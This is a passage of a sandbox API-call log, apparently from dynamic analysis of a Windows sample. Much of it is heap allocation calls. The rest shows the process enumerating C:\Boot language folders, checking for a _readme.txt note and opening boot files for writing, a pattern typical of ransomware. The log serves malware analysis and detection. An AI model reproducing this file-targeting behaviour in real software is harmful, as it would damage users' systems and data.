hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.210] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.210] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.211] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.212] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0058.213] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.214] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.214] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.214] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0058.214] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.214] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.214] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.214] PathFindFileNameW (pszPath="") returned="" [0058.214] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.214] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.214] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.214] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.214] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebf8 | out: hHeap=0x660000) returned 1 [0058.214] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.214] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ed88 | out: hHeap=0x660000) returned 1 [0058.214] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0058.214] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0058.215] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.215] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.215] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.215] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.215] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0058.215] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.215] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb91e10, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.215] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned=".txt" [0058.215] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb91e10, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eb91e10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eb91e10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.215] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.215] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.215] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0058.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.215] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0058.216] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0058.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.216] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0058.216] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0058.216] PathFindFileNameW (pszPath="") returned="" [0058.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ebf8 [0058.216] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0058.216] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0058.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3268798 [0058.216] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3268798 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0058.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5da58 [0058.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ed88 [0058.216] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0058.216] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0058.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0058.216] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0058.217] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0058.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.217] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.217] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0058.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.217] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0058.217] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.217] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0058.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e770 [0058.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216680 [0058.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e770 | out: hHeap=0x660000) returned 1 [0058.217] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned=".txt" [0058.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3216680 | out: hHeap=0x660000) returned 1 [0058.217] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebb7f70, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebb7f70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebb7f70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0058.217] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0058.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e950 | out: hHeap=0x660000) returned 1 [0058.217] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e950 [0058.217] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 